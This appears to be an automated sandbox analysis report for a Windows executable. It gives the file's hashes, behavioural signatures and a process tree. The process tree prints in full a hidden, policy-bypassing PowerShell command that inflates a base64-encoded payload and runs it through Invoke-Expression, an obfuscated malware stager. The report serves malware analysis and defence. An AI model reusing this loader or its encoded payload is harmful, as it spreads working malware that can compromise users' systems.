Analysis
-
max time kernel
122s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
24/10/2023, 02:27
Static task
static1
Behavioral task
behavioral1
Sample
8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe
Resource
win10v2004-20231023-en
General
-
Target
8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe
-
Size
384KB
-
MD5
cddc6e9339050146fb532f76c6364ff9
-
SHA1
e014f6777e202a6b25df3e10de0fbd4c3ae579e0
-
SHA256
8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2
-
SHA512
47c3c18d2842c287801b49237d9c3933f4455361492de856f1cd0d2c75a9d45092ddd8f660fd0453cea10513f32b9e5b6047cb1726a043f7b1f1befa25b99256
-
SSDEEP
6144:dt5hBPi0BW69hd1MMdxPe9N9uA069TBSS5:dtzww69TMS5
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2236 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2236 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2052 wrote to memory of 1580 2052 8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe 28 PID 2052 wrote to memory of 1580 2052 8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe 28 PID 2052 wrote to memory of 1580 2052 8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe 28 PID 1580 wrote to memory of 2236 1580 cmd.exe 30 PID 1580 wrote to memory of 2236 1580 cmd.exe 30 PID 1580 wrote to memory of 2236 1580 cmd.exe 30 PID 1580 wrote to memory of 2236 1580 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe"C:\Users\Admin\AppData\Local\Temp\8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9B65.tmp\9B66.tmp\9B67.bat C:\Users\Admin\AppData\Local\Temp\8bb2289a9b517feaada0d786135691be17f8bad0be5adee6ba0d9fae39b760d2.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkhoDQIiZvSIrUpIqh9iPLgbAayZb1r7Y6TGJp/7xictiBaVX069u7MOWcuGwg4hhPfm14odVmUxlLo36PVqPZ76UIpP5pBWc2VFOAoJwbcEN/DpaYrsvBFWqpydaqUEWF7to6hkppg02Ld4kN09N865xZzwpslw2KnU7W8qxh+Kbdfv2m3J426f+KRrR8Dx0WPcZ18nn9DQTCpHWGRjpHSiRH3SK5FCKdv3J0uFhadG+WFVPVsOGQBtBywNvY+hrcynvGmLpHDJ8RFFG8HXllDRhjVht6IMvICl54brdlouNd910u7h4O01z9Iu73BXgyDbJBF8B1MRYmulDqCoOTqpqfW5o2558Zdau6qFhj685rQj6EfceCGA5n9GgXKFYZB+Yroge8zL6j/gW96JoldrtByLxrnhruy32POOIs6B41aPc1mDeHmbOStl1IhhKyQKPp7cgSPjZPOS6t1HDx0DuJu/Od2j1R+55htbDRGsPVujWVFedxlL5J1EfrNV6fDCmwukI27Hd0rR++RzrhQF055qWZs5EOuFwojzkq6s60XEOfyXiTN4CApsJijvcBbqSVJoyEQkIzzAsH/KvV+z4dE858rc4HwdDKqtGgiHSRl7hwtbdUM6Dig4fDFG8vioE4/or6jZZxt9rMsY+hnkbdzfl1pkgWmT1tpygnalRTo0k+5dctcNSM0Zd10EDKe2/PrmIXBJt21PYpi+CnC+0e7qbfPjxXjYBM38Gr1JpRbSiYKsYRkgsLoBQwO+1m2FTmJ5eP2Bw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5eca033c64955fdba5726603cde858bf3
SHA1b000490902c189913ce7296ded5eb89bb026dd4c
SHA25674409e6db210f816202671fa30505219087175c4c0a6841d079b113c425508b5
SHA5123af48c712a3417810a4a11fc6af61bd56aff777d6a621ef883092aeca64630ac9fdc4aa54b70ccf4baa9779e567b1a806d2ac87a95cba5ec2b27c81110ea7f4e